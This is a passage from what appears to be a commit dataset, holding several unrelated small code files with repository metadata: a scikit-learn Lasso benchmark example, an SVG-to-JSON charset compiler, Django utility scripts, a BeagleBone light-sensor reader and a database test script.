cikit-learn,larsmans/scikit-learn,MartinDelzant/scikit-learn,zihua/scikit-learn,florian-f/sklearn,petosegan/scikit-learn,jorge2703/scikit-learn,xzh86/scikit-learn,lesteve/scikit-learn,sumspr/scikit-learn,ahoyosid/scikit-learn,AnasGhrab/scikit-learn,Srisai85/scikit-learn,rajat1994/scikit-learn,kjung/scikit-learn,scikit-learn/scikit-learn,mattgiguere/scikit-learn,alvarofierroclavero/scikit-learn,abhishekgahlot/scikit-learn,AIML/scikit-learn,deepesch/scikit-learn,mojoboss/scikit-learn,fabianp/scikit-learn,pkruskal/scikit-learn,zaxtax/scikit-learn,samuel1208/scikit-learn,phdowling/scikit-learn,untom/scikit-learn,mattilyra/scikit-learn,dsquareindia/scikit-learn,ChanderG/scikit-learn,MechCoder/scikit-learn,abhishekgahlot/scikit-learn,davidgbe/scikit-learn,ltiao/scikit-learn,marcocaccin/scikit-learn,shahankhatch/scikit-learn,nrhine1/scikit-learn,procoder317/scikit-learn,eickenberg/scikit-learn,pv/scikit-learn,vigilv/scikit-learn,MohammedWasim/scikit-learn,eickenberg/scikit-learn,zhenv5/scikit-learn,nelson-liu/scikit-learn,kmike/scikit-learn,BiaDarkia/scikit-learn | examples/linear_model/lasso_dense_vs_sparse_data.py | examples/linear_model/lasso_dense_vs_sparse_data.py | """
==============================
Lasso on dense and sparse data
==============================
We show that linear_model.Lasso and linear_model.sparse.Lasso
provide the same results and that in the case of
sparse data linear_model.sparse.Lasso improves the speed.
"""
print __doc__
from time import time
import numpy as np
from scipy import sparse
from scipy import linalg
from sklearn.linear_model.sparse import Lasso as SparseLasso
from sklearn.linear_model import Lasso as DenseLasso
###############################################################################
# The two Lasso implementations on Dense data
print "--- Dense matrices"
n_samples, n_features = 200, 10000
np.random.seed(0)
y = np.random.randn(n_samples)
X = np.random.randn(n_samples, n_features)
alpha = 1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)
t0 = time()
sparse_lasso.fit(X, y)
print "Sparse Lasso done in %fs" % (time() - t0)
t0 = time()
dense_lasso.fit(X, y)
print "Dense Lasso done in %fs" % (time() - t0)
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
- dense_lasso.coef_)
###############################################################################
# The two Lasso implementations on Sparse data
print "--- Sparse matrices"
Xs = X.copy()
Xs[Xs < 2.5] = 0.0
Xs = sparse.coo_matrix(Xs)
Xs = Xs.tocsc()
print "Matrix density : %s %%" % (Xs.nnz / float(X.size) * 100)
alpha = 0.1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)
t0 = time()
sparse_lasso.fit(Xs, y)
print "Sparse Lasso done in %fs" % (time() - t0)
t0 = time()
dense_lasso.fit(Xs.todense(), y)
print "Dense Lasso done in %fs" % (time() - t0)
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
- dense_lasso.coef_)
| """
==============================
Lasso on dense and sparse data
==============================
We show that linear_model.Lasso and linear_model.sparse.Lasso
provide the same results and that in the case of
sparse data linear_model.sparse.Lasso improves the speed.
"""
print __doc__
from time import time
import numpy as np
from scipy import sparse
from scipy import linalg
from sklearn.linear_model.sparse import Lasso as SparseLasso
from sklearn.linear_model import Lasso as DenseLasso
###############################################################################
# The two Lasso implementations on Dense data
print "--- Dense matrices"
n_samples, n_features = 200, 10000
np.random.seed(0)
y = np.random.randn(n_samples)
X = np.random.randn(n_samples, n_features)
alpha = 1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False)
t0 = time()
sparse_lasso.fit(X, y, max_iter=1000)
print "Sparse Lasso done in %fs" % (time() - t0)
t0 = time()
dense_lasso.fit(X, y, max_iter=1000)
print "Dense Lasso done in %fs" % (time() - t0)
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
- dense_lasso.coef_)
###############################################################################
# The two Lasso implementations on Sparse data
print "--- Sparse matrices"
Xs = X.copy()
Xs[Xs < 2.5] = 0.0
Xs = sparse.coo_matrix(Xs)
Xs = Xs.tocsc()
print "Matrix density : %s %%" % (Xs.nnz / float(X.size) * 100)
alpha = 0.1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False)
t0 = time()
sparse_lasso.fit(Xs, y, max_iter=1000)
print "Sparse Lasso done in %fs" % (time() - t0)
t0 = time()
dense_lasso.fit(Xs.todense(), y, max_iter=1000)
print "Dense Lasso done in %fs" % (time() - t0)
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
- dense_lasso.coef_)
| bsd-3-clause | Python |
35e30faabc3fd7ca68b7b28c9fd5b7a4c15b0e21 | add charset compilation script | jaames/kakimasu,jaames/kakimasu,jaames/kakimasu,jaames/kakimasu | util/charset.py | util/charset.py | # charset.py - lazy utility script for compiling character svgs, animation data and details into a single .json
#
# Usage:
# python charset.py [charset directory]
#
# The charset directory should have the following:
# - 'base.json' which contains the data and animation timings for each character in an array format, which an object for each character:
# - id
# - romaji (pronunciation/name for the character in the Latin alphabet)
# - timings (array of timings for each path)
# - an 'svg' directory containing an svg file for each character, in the format of [character id].svg
#
# For an example, check out https://github.com/jaames/kakimasu/tree/master/charsets/hiragana
from os.path import splitext
from sys import argv
import xml.etree.ElementTree as xmlParser
import json
# xml namespace for svgs
# ref: https://docs.python.org/3/library/xml.etree.elementtree.html#parsing-xml-with-namespaces
ns = {"svg": "http://www.w3.org/2000/svg"}
charSetDir = argv[1]
with open(charSetDir + "/base.json") as file:
charMap = json.load(file)
for char in charMap:
tree = xmlParser.parse(charSetDir + "/svg/" + char["id"] + ".svg")
root = tree.getroot()
pathGroup = root.find("svg:g", ns)[0]
# for debugging:
# print(char['id'])
# for path in pathGroup:
# print(path.attrib)
# lazyyyy fallback for if there's no defined stroke timings
timings = char["timings"] if "timings" in char else [100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
# create an array of svg paths (d) and their stroke timings (t)
char["paths"] = [{"d": path.attrib['d'], "t": timings[i]} for i, path in enumerate(pathGroup)]
# we don't want the timings array in the compiled file
if "timings" in char: del char["timings"]
with open(charSetDir + "/compiled.json", "w") as out:
out.write(json.dumps(charMap, sort_keys=True))
print("Finished compiling " + charSetDir)
| mit | Python | |
0d9613a1410aad150ccaf4b828971ec6f9e31520 | Create lang.py | jmister28/GitZip,jmister28/GitZip | lang.py | lang.py | mit | Python | ||
2f268173e25bee5d671583bb905829e0ffd4f631 | Add management command to clear all matches mostly useful with heroku | maxf/address-matcher,maxf/address-matcher,maxf/address-matcher,maxf/address-matcher | match/management/commands/reset-matches.py | match/management/commands/reset-matches.py | from django.core.management.base import BaseCommand, CommandError
from match.models import Match
import sys
class Command(BaseCommand):
help = 'Reset all match data'
def handle(self, *args, **options):
Match.objects.all().delete()
| mit | Python | |
732eee568f19ed2e63f357b62fa539ff50a1c046 | add program to display light readings in terminal in inf loop | davidbradway/beaglebone-python | light.py | light.py | #!/usr/bin/python
"""
light.py
Read analog values from the photoresistor
=======
run with:
sudo ./light.py
Copyright 2014 David P. Bradway (dpb6@duke.edu)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = "David Bradway"
__email__ = "dpb6@duke.edu"
__license__ = "Apache v2.0"
def main():
import Adafruit_BBIO.ADC as ADC
import time
sensor_pin = 'P9_40'
ADC.setup()
print('Reading\t\tVolts')
while True:
reading = ADC.read(sensor_pin)
volts = reading * 1.800
print('%f\t%f' % (reading, volts))
time.sleep(1)
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
591bdcbfb80927d0ffb4922eb684fe7ce17c5456 | Add manage.py | gmuthetatau/zoohackathon2016,gmuthetatau/zoohackathon2016,gmuthetatau/zoohackathon2016 | web/zoohackathon2016/manage.py | web/zoohackathon2016/manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "zoohackathon2016.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| apache-2.0 | Python | |
cb26da63add95ebf9e7aa84a381293dd80f433cb | add test_db, test is OK | haibo-yu/awesome-python-webapp,haibo-yu/awesome-python-webapp,haibo-yu/awesome-python-webapp | www/test_db.py | www/test_db.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Haibo-Yu'
from models import User, Blog, Comment
from transwarp import db
db.create_engine(user='www-data', password='www-data', database='awesome')
u = User(name='Test', email='test@example.com', password='1234567890', image='about:blank')
u.insert()
print 'new user id:', u.id
u1 = User.find_first('where email=?', 'test@example.com')
print 'find user\'s name:', u1.name
u1.delete()
u2 = User.find_first('where email=?', 'test@example.com')
print 'find user:', u2
| unlicense | Python | |
ad5b3a334203394792c90b0d1bfe2dda8efe13b3 | add admin interface for tracking logs | prarthitm/edxplatform,cecep-edu/edx-platform,ferabra/edx-platform,ubc/edx-platform,msegado/edx-platform,louyihua/edx-platform,mjg2203/edx-platform-seas,mjirayu/sit_academy,chrisndodge/edx-platform,utecuy/edx-platform,rationalAgent/edx-platform-custom,kalebhartje/schoolboost,beacloudgenius/edx-platform,SivilTaram/edx-platform,eestay/edx-platform,sameetb-cuelogic/edx-platform-test,cselis86/edx-platform,shashank971/edx-platform,etzhou/edx-platform,naresh21/synergetics-edx-platform,prarthitm/edxplatform,edx-solutions/edx-platform,mitocw/edx-platform,valtech-mooc/edx-platform,CourseTalk/edx-platform,zubair-arbi/edx-platform,tanmaykm/edx-platform,Ayub-Khan/edx-platform,utecuy/edx-platform,doganov/edx-platform,DNFcode/edx-platform,jamiefolsom/edx-platform,xinjiguaike/edx-platform,motion2015/edx-platform,nagyistoce/edx-platform,gsehub/edx-platform,kmoocdev2/edx-platform,vasyarv/edx-platform,abdoosh00/edraak,zerobatu/edx-platform,SivilTaram/edx-platform,benpatterson/edx-platform,kamalx/edx-platform,Shrhawk/edx-platform,4eek/edx-platform,olexiim/edx-platform,ovnicraft/edx-platform,halvertoluke/edx-platform,pepeportela/edx-platform,Edraak/edraak-platform,simbs/edx-platform,hkawasaki/kawasaki-aio8-2,unicri/edx-platform,shashank971/edx-platform,beacloudgenius/edx-platform,yokose-ks/edx-platform,proversity-org/edx-platform,Ayub-Khan/edx-platform,doismellburning/edx-platform,PepperPD/edx-pepper-platform,antoviaque/edx-platform,ubc/edx-platform,martynovp/edx-platform,DNFcode/edx-platform,cognitiveclass/edx-platform,nagyistoce/edx-platform,CourseTalk/edx-platform,naresh21/synergetics-edx-platform,gymnasium/edx-platform,jruiperezv/ANALYSE,valtech-mooc/edx-platform,jbzdak/edx-platform,kxliugang/edx-platform,kursitet/edx-platform,kmoocdev/edx-platform,EduPepperPDTesting/pepper2013-testing,mtlchun/edx,andyzsf/edx,shubhdev/edx-platform,dsajkl/123,JioEducation/edx-platform,DNFcode/edx-platform,bdero/edx-platform,alexthered/kienhoc-platform,IITBinterns13/edx-platform-dev,Edraak/edraak-platform,hkawasaki/kawasaki-aio8-0,B-MOOC/edx-platform,nanolearning/edx-platform,nttks/jenkins-test,caesar2164/edx-platform,unicri/edx-platform,adoosii/edx-platform,jamesblunt/edx-platform,nanolearningllc/edx-platform-cypress,ferabra/edx-platform,shurihell/testasia,SivilTaram/edx-platform,EduPepperPDTesting/pepper2013-testing,wwj718/edx-platform,appliedx/edx-platform,jamiefolsom/edx-platform,eduNEXT/edx-platform,xingyepei/edx-platform,zofuthan/edx-platform,cognitiveclass/edx-platform,motion2015/edx-platform,marcore/edx-platform,teltek/edx-platform,ampax/edx-platform,sudheerchintala/LearnEraPlatForm,jruiperezv/ANALYSE,jbzdak/edx-platform,PepperPD/edx-pepper-platform,Livit/Livit.Learn.EdX,IndonesiaX/edx-platform,jbzdak/edx-platform,louyihua/edx-platform,fly19890211/edx-platform,doismellburning/edx-platform,devs1991/test_edx_docmode,halvertoluke/edx-platform,martynovp/edx-platform,nanolearning/edx-platform,Softmotions/edx-platform,pelikanchik/edx-platform,auferack08/edx-platform,appliedx/edx-platform,jswope00/GAI,ZLLab-Mooc/edx-platform,eduNEXT/edx-platform,Shrhawk/edx-platform,ahmedaljazzar/edx-platform,hastexo/edx-platform,raccoongang/edx-platform,msegado/edx-platform,jamesblunt/edx-platform,10clouds/edx-platform,bitifirefly/edx-platform,bigdatauniversity/edx-platform,PepperPD/edx-pepper-platform,shurihell/testasia,y12uc231/edx-platform,rue89-tech/edx-platform,bdero/edx-platform,rhndg/openedx,LICEF/edx-platform,mbareta/edx-platform-ft,EDUlib/edx-platform,CourseTalk/edx-platform,LICEF/edx-platform,alexthered/kienhoc-platform,rismalrv/edx-platform,ampax/edx-platform-backup,hkawasaki/kawasaki-aio8-1,a-parhom/edx-platform,Semi-global/edx-platform,carsongee/edx-platform,syjeon/new_edx,nanolearning/edx-platform,yokose-ks/edx-platform,nttks/edx-platform,jazkarta/edx-platform,nttks/jenkins-test,jswope00/griffinx,ZLLab-Mooc/edx-platform,JCBarahona/edX,ESOedX/edx-platform,nikolas/edx-platform,Ayub-Khan/edx-platform,arifsetiawan/edx-platform,chudaol/edx-platform,pabloborrego93/edx-platform,EduPepperPD/pepper2013,ak2703/edx-platform,jbassen/edx-platform,jswope00/griffinx,edry/edx-platform,kmoocdev/edx-platform,bitifirefly/edx-platform,zubair-arbi/edx-platform,Endika/edx-platform,a-parhom/edx-platform,solashirai/edx-platform,AkA84/edx-platform,jazkarta/edx-platform,antonve/s4-project-mooc,shabab12/edx-platform,philanthropy-u/edx-platform,IndonesiaX/edx-platform,morpheby/levelup-by,pdehaye/theming-edx-platform,LICEF/edx-platform,inares/edx-platform,Kalyzee/edx-platform,doismellburning/edx-platform,EDUlib/edx-platform,pomegranited/edx-platform,B-MOOC/edx-platform,morpheby/levelup-by,mbareta/edx-platform-ft,antoviaque/edx-platform,zadgroup/edx-platform,olexiim/edx-platform,LearnEra/LearnEraPlaftform,bitifirefly/edx-platform,defance/edx-platform,DefyVentures/edx-platform,BehavioralInsightsTeam/edx-platform,EduPepperPD/pepper2013,nanolearningllc/edx-platform-cypress-2,vismartltd/edx-platform,a-parhom/edx-platform,jruiperezv/ANALYSE,Lektorium-LLC/edx-platform,jelugbo/tundex,dcosentino/edx-platform,deepsrijit1105/edx-platform,jbzdak/edx-platform,LICEF/edx-platform,doganov/edx-platform,shubhdev/edxOnBaadal,utecuy/edx-platform,Edraak/circleci-edx-platform,MSOpenTech/edx-platform,polimediaupv/edx-platform,jelugbo/tundex,mcgachey/edx-platform,devs1991/test_edx_docmode,marcore/edx-platform,cecep-edu/edx-platform,antonve/s4-project-mooc,sudheerchintala/LearnEraPlatForm,hamzehd/edx-platform,pelikanchik/edx-platform,valtech-mooc/edx-platform,defance/edx-platform,mcgachey/edx-platform,rue89-tech/edx-platform,eemirtekin/edx-platform,atsolakid/edx-platform,rue89-tech/edx-platform,4eek/edx-platform,mcgachey/edx-platform,mahendra-r/edx-platform,amir-qayyum-khan/edx-platform,mtlchun/edx,openfun/edx-platform,abdoosh00/edraak,andyzsf/edx,rue89-tech/edx-platform,jonathan-beard/edx-platform,cpennington/edx-platform,xingyepei/edx-platform,ak2703/edx-platform,arbrandes/edx-platform,doganov/edx-platform,teltek/edx-platform,motion2015/a3,Stanford-Online/edx-platform,atsolakid/edx-platform,kalebhartje/schoolboost,hmcmooc/muddx-platform,simbs/edx-platform,mtlchun/edx,chand3040/cloud_that,abdoosh00/edx-rtl-final,jonathan-beard/edx-platform,Edraak/circleci-edx-platform,shubhdev/openedx,chand3040/cloud_that,Edraak/circleci-edx-platform,SravanthiSinha/edx-platform,jjmiranda/edx-platform,philanthropy-u/edx-platform,cyanna/edx-platform,Endika/edx-platform,don-github/edx-platform,Livit/Livit.Learn.EdX,kamalx/edx-platform,vikas1885/test1,AkA84/edx-platform,rationalAgent/edx-platform-custom,fintech-circle/edx-platform,antonve/s4-project-mooc,jswope00/GAI,chrisndodge/edx-platform,TsinghuaX/edx-platform,beni55/edx-platform,Edraak/edx-platform,jbzdak/edx-platform,Unow/edx-platform,synergeticsedx/deployment-wipro,louyihua/edx-platform,TeachAtTUM/edx-platform,knehez/edx-platform,TsinghuaX/edx-platform,prarthitm/edxplatform,RPI-OPENEDX/edx-platform,itsjeyd/edx-platform,shubhdev/edxOnBaadal,AkA84/edx-platform,nttks/edx-platform,Edraak/edraak-platform,y12uc231/edx-platform,playm2mboy/edx-platform,abdoosh00/edx-rtl-final,UXE/local-edx,edx/edx-platform,J861449197/edx-platform,polimediaupv/edx-platform,pelikanchik/edx-platform,dsajkl/123,CredoReference/edx-platform,wwj718/ANALYSE,itsjeyd/edx-platform,IITBinterns13/edx-platform-dev,jazztpt/edx-platform,adoosii/edx-platform,zubair-arbi/edx-platform,zhenzhai/edx-platform,eduNEXT/edunext-platform,romain-li/edx-platform,chudaol/edx-platform,4eek/edx-platform,eduNEXT/edx-platform,kmoocdev/edx-platform,EduPepperPD/pepper2013,chudaol/edx-platform,ampax/edx-platform-backup,eemirtekin/edx-platform,dcosentino/edx-platform,praveen-pal/edx-platform,DefyVentures/edx-platform,fintech-circle/edx-platform,benpatterson/edx-platform,mbareta/edx-platform-ft,zubair-arbi/edx-platform,TsinghuaX/edx-platform,ESOedX/edx-platform,xingyepei/edx-platform,J861449197/edx-platform,PepperPD/edx-pepper-platform,appsembler/edx-platform,edry/edx-platform,xinjiguaike/edx-platform,analyseuc3m/ANALYSE-v1,franosincic/edx-platform,nttks/edx-platform,shubhdev/edx-platform,zhenzhai/edx-platform,doganov/edx-platform,antoviaque/edx-platform,edx/edx-platform,openfun/edx-platform,UOMx/edx-platform,kursitet/edx-platform,alexthered/kienhoc-platform,jswope00/griffinx,jolyonb/edx-platform,marcore/edx-platform,eestay/edx-platform,zofuthan/edx-platform,hamzehd/edx-platform,nanolearningllc/edx-platform-cypress-2,EduPepperPD/pepper2013,mjirayu/sit_academy,itsjeyd/edx-platform,polimediaupv/edx-platform,pabloborrego93/edx-platform,nanolearningllc/edx-platform-cypress,caesar2164/edx-platform,morenopc/edx-platform,EDUlib/edx-platform,procangroup/edx-platform,atsolakid/edx-platform,WatanabeYasumasa/edx-platform,vismartltd/edx-platform,jazztpt/edx-platform,bdero/edx-platform,don-github/edx-platform,vasyarv/edx-platform,ovnicraft/edx-platform,kxliugang/edx-platform,angelapper/edx-platform,waheedahmed/edx-platform,devs1991/test_edx_docmode,leansoft/edx-platform,jzoldak/edx-platform,EduPepperPDTesting/pepper2013-testing,prarthitm/edxplatform,UXE/local-edx,IITBinterns13/edx-platform-dev,torchingloom/edx-platform,mahendra-r/edx-platform,dcosentino/edx-platform,kmoocdev2/edx-platform,unicri/edx-platform,Lektorium-LLC/edx-platform,Edraak/edraak-platform,SivilTaram/edx-platform,J861449197/edx-platform,fintech-circle/edx-platform,xuxiao19910803/edx,IndonesiaX/edx-platform,halvertoluke/edx-platform,beacloudgenius/edx-platform,tanmaykm/edx-platform,Shrhawk/edx-platform,DNFcode/edx-platform,alu042/edx-platform,dkarakats/edx-platform,angelapper/edx-platform,inares/edx-platform,simbs/edx-platform,shurihell/testasia,chudaol/edx-platform,beacloudgenius/edx-platform,apigee/edx-platform,MakeHer/edx-platform,kamalx/edx-platform,chand3040/cloud_that,DefyVentures/edx-platform,jazkarta/edx-platform-for-isc,hkawasaki/kawasaki-aio8-0,hkawasaki/kawasaki-aio8-1,louyihua/edx-platform,devs1991/test_edx_docmode,benpatterson/edx-platform,jazkarta/edx-platform-for-isc,amir-qayyum-khan/edx-platform,playm2mboy/edx-platform,motion2015/edx-platform,xinjiguaike/edx-platform,zadgroup/edx-platform,Stanford-Online/edx-platform,morenopc/edx-platform,ahmedaljazzar/edx-platform,Semi-global/edx-platform,jamiefolsom/edx-platform,jelugbo/tundex,mitocw/edx-platform,Edraak/edx-platform,shubhdev/edx-platform,fly19890211/edx-platform,pepeportela/edx-platform,mtlchun/edx,edry/edx-platform,hkawasaki/kawasaki-aio8-0,jamiefolsom/edx-platform,RPI-OPENEDX/edx-platform,ak2703/edx-platform,openfun/edx-platform,jazztpt/edx-platform,UOMx/edx-platform,chauhanhardik/populo,shabab12/edx-platform,apigee/edx-platform,MakeHer/edx-platform,mjirayu/sit_academy,shashank971/edx-platform,morenopc/edx-platform,Kalyzee/edx-platform,Ayub-Khan/edx-platform,dsajkl/123,analyseuc3m/ANALYSE-v1,hkawasaki/kawasaki-aio8-0,kalebhartje/schoolboost,jswope00/GAI,jazztpt/edx-platform,cpennington/edx-platform,WatanabeYasumasa/edx-platform,kxliugang/edx-platform,ak2703/edx-platform,MakeHer/edx-platform,cselis86/edx-platform,solashirai/edx-platform,openfun/edx-platform,lduarte1991/edx-platform,leansoft/edx-platform,olexiim/edx-platform,deepsrijit1105/edx-platform,arifsetiawan/edx-platform,etzhou/edx-platform,rismalrv/edx-platform,ubc/edx-platform,nikolas/edx-platform,chauhanhardik/populo_2,shubhdev/edxOnBaadal,mjg2203/edx-platform-seas,vikas1885/test1,Edraak/edx-platform,kmoocdev/edx-platform,jswope00/GAI,waheedahmed/edx-platform,chauhanhardik/populo,devs1991/test_edx_docmode,jazkarta/edx-platform-for-isc,ahmadiga/min_edx,jonathan-beard/edx-platform,SravanthiSinha/edx-platform,LearnEra/LearnEraPlaftform,WatanabeYasumasa/edx-platform,tiagochiavericosta/edx-platform,xuxiao19910803/edx-platform,playm2mboy/edx-platform,nttks/edx-platform,analyseuc3m/ANALYSE-v1,shashank971/edx-platform,franosincic/edx-platform,chand3040/cloud_that,doismellburning/edx-platform,stvstnfrd/edx-platform,ferabra/edx-platform,jolyonb/edx-platform,morenopc/edx-platform,bigdatauniversity/edx-platform,UOMx/edx-platform,OmarIthawi/edx-platform,vismartltd/edx-platform,IONISx/edx-platform,beni55/edx-platform,mbareta/edx-platform-ft,etzhou/edx-platform,praveen-pal/edx-platform,BehavioralInsightsTeam/edx-platform,LearnEra/LearnEraPlaftform,proversity-org/edx-platform,arbrandes/edx-platform,Semi-global/edx-platform,bdero/edx-platform,Kalyzee/edx-platform,RPI-OPENEDX/edx-platform,fintech-circle/edx-platform,RPI-OPENEDX/edx-platform,synergeticsedx/deployment-wipro,xinjiguaike/edx-platform,eemirtekin/edx-platform,hastexo/edx-platform,EduPepperPDTesting/pepper2013-testing,knehez/edx-platform,TeachAtTUM/edx-platform,olexiim/edx-platform,nagyistoce/edx-platform,romain-li/edx-platform,IONISx/edx-platform,etzhou/edx-platform,benpatterson/edx-platform,jolyonb/edx-platform,xuxiao19910803/edx,EDUlib/edx-platform,rationalAgent/edx-platform-custom,longmen21/edx-platform,stvstnfrd/edx-platform,ampax/edx-platform-backup,cognitiveclass/edx-platform,Lektorium-LLC/edx-platform,andyzsf/edx,cselis86/edx-platform,ahmedaljazzar/edx-platform,Stanford-Online/edx-platform,y12uc231/edx-platform,nanolearningllc/edx-platform-cypress,franosincic/edx-platform,pku9104038/edx-platform,halvertoluke/edx-platform,ferabra/edx-platform,amir-qayyum-khan/edx-platform,kalebhartje/schoolboost,kursitet/edx-platform,LICEF/edx-platform,CourseTalk/edx-platform,lduarte1991/edx-platform,fly19890211/edx-platform,inares/edx-platform,ZLLab-Mooc/edx-platform,torchingloom/edx-platform,proversity-org/edx-platform,beni55/edx-platform,devs1991/test_edx_docmode,a-parhom/edx-platform,franosincic/edx-platform,zubair-arbi/edx-platform,LearnEra/LearnEraPlaftform,amir-qayyum-khan/edx-platform,bigdatauniversity/edx-platform,xuxiao19910803/edx,dkarakats/edx-platform,gsehub/edx-platform,Softmotions/edx-platform,jonathan-beard/edx-platform,leansoft/edx-platform,andyzsf/edx,jruiperezv/ANALYSE,kxliugang/edx-platform,IONISx/edx-platform,eduNEXT/edunext-platform,philanthropy-u/edx-platform,halvertoluke/edx-platform,abdoosh00/edraak,jruiperezv/ANALYSE,alu042/edx-platform,pomegranited/edx-platform,mahendra-r/edx-platform,jbassen/edx-platform,sameetb-cuelogic/edx-platform-test,cognitiveclass/edx-platform,J861449197/edx-platform,alu042/edx-platform,jazztpt/edx-platform,cpennington/edx-platform,kmoocdev2/edx-platform,shubhdev/edx-platform,martynovp/edx-platform,bitifirefly/edx-platform,10clouds/edx-platform,y12uc231/edx-platform,doganov/edx-platform,nanolearningllc/edx-platform-cypress-2,eduNEXT/edunext-platform,yokose-ks/edx-platform,rismalrv/edx-platform,RPI-OPENEDX/edx-platform,Edraak/circleci-edx-platform,jbassen/edx-platform,dcosentino/edx-platform,Edraak/edx-platform,rhndg/openedx,cecep-edu/edx-platform,gymnasium/edx-platform,abdoosh00/edraak,nanolearningllc/edx-platform-cypress-2,atsolakid/edx-platform,inares/edx-platform,shashank971/edx-platform,jjmiranda/edx-platform,alexthered/kienhoc-platform,marcore/edx-platform,wwj718/edx-platform,chrisndodge/edx-platform,jamiefolsom/edx-platform,B-MOOC/edx-platform,hmcmooc/muddx-platform,AkA84/edx-platform,utecuy/edx-platform,longmen21/edx-platform,pdehaye/theming-edx-platform,deepsrijit1105/edx-platform,MSOpenTech/edx-platform,rismalrv/edx-platform,carsongee/edx-platform,ahmadiga/min_edx,B-MOOC/edx-platform,pomegranited/edx-platform,PepperPD/edx-pepper-platform,syjeon/new_edx,chudaol/edx-platform,arifsetiawan/edx-platform,fly19890211/edx-platform,waheedahmed/edx-platform,Unow/edx-platform,Stanford-Online/edx-platform,morenopc/edx-platform,hkawasaki/kawasaki-aio8-2,mcgachey/edx-platform,IndonesiaX/edx-platform,tiagochiavericosta/edx-platform,arifsetiawan/edx-platform,JCBarahona/edX,OmarIthawi/edx-platform,jzoldak/edx-platform,cognitiveclass/edx-platform,ZLLab-Mooc/edx-platform,cselis86/edx-platform,polimediaupv/edx-platform,auferack08/edx-platform,beni55/edx-platform,iivic/BoiseStateX,cecep-edu/edx-platform,edx-solutions/edx-platform,iivic/BoiseStateX,tiagochiavericosta/edx-platform,mahendra-r/edx-platform,jzoldak/edx-platform,eemirtekin/edx-platform,eestay/edx-platform,defance/edx-platform,JCBarahona/edX,JCBarahona/edX,lduarte1991/edx-platform,pabloborrego93/edx-platform,wwj718/edx-platform,caesar2164/edx-platform,sameetb-cuelogic/edx-platform-test,edry/edx-platform,chrisndodge/edx-platform,cyanna/edx-platform,antonve/s4-project-mooc,xingyepei/edx-platform,rhndg/openedx,shubhdev/openedx,vikas1885/test1,vasyarv/edx-platform,eduNEXT/edx-platform,rhndg/openedx,apigee/edx-platform,peterm-itr/edx-platform,ovnicraft/edx-platform,Kalyzee/edx-platform,zadgroup/edx-platform,vismartltd/edx-platform,kmoocdev2/edx-platform,don-github/edx-platform,CredoReference/edx-platform,zofuthan/edx-platform,vasyarv/edx-platform,msegado/edx-platform,ferabra/edx-platform,angelapper/edx-platform,AkA84/edx-platform,teltek/edx-platform,ampax/edx-platform,pku9104038/edx-platform,carsongee/edx-platform,nttks/jenkins-test,alu042/edx-platform,MSOpenTech/edx-platform,devs1991/test_edx_docmode,bigdatauniversity/edx-platform,miptliot/edx-platform,leansoft/edx-platform,ubc/edx-platform,adoosii/edx-platform,utecuy/edx-platform,nanolearningllc/edx-platform-cypress,xingyepei/edx-platform,dsajkl/reqiop,dkarakats/edx-platform,ahmadiga/min_edx,simbs/edx-platform,jazkarta/edx-platform,abdoosh00/edx-rtl-final,gsehub/edx-platform,mitocw/edx-platform,tiagochiavericosta/edx-platform,dsajkl/123,arifsetiawan/edx-platform,don-github/edx-platform,naresh21/synergetics-edx-platform,SravanthiSinha/edx-platform,Unow/edx-platform,inares/edx-platform,SravanthiSinha/edx-platform,zhenzhai/edx-platform,hastexo/edx-platform,dsajkl/reqiop,4eek/edx-platform,beacloudgenius/edx-platform,edry/edx-platform,nikolas/edx-platform,iivic/BoiseStateX,appsembler/edx-platform,10clouds/edx-platform,chauhanhardik/populo,MSOpenTech/edx-platform,carsongee/edx-platform,mitocw/edx-platform,martynovp/edx-platform,jamesblunt/edx-platform,MakeHer/edx-platform,rationalAgent/edx-platform-custom,Kalyzee/edx-platform,hamzehd/edx-platform,solashirai/edx-platform,edx-solutions/edx-platform,abdoosh00/edx-rtl-final,IONISx/edx-platform,mushtaqak/edx-platform,CredoReference/edx-platform,rationalAgent/edx-platform-custom,eduNEXT/edunext-platform,pomegranited/edx-platform,xinjiguaike/edx-platform,don-github/edx-platform,Unow/edx-platform,jamesblunt/edx-platform,zerobatu/edx-platform,JCBarahona/edX,cyanna/edx-platform,torchingloom/edx-platform,shabab12/edx-platform,TeachAtTUM/edx-platform,kxliugang/edx-platform,wwj718/ANALYSE,chauhanhardik/populo_2,solashirai/edx-platform,B-MOOC/edx-platform,dsajkl/reqiop,DefyVentures/edx-platform,mjg2203/edx-platform-seas,UXE/local-edx,unicri/edx-platform,xuxiao19910803/edx,defance/edx-platform,hmcmooc/muddx-platform,Endika/edx-platform,dcosentino/edx-platform,jonathan-beard/edx-platform,ZLLab-Mooc/edx-platform,appliedx/edx-platform,miptliot/edx-platform,doismellburning/edx-platform,jazkarta/edx-platform-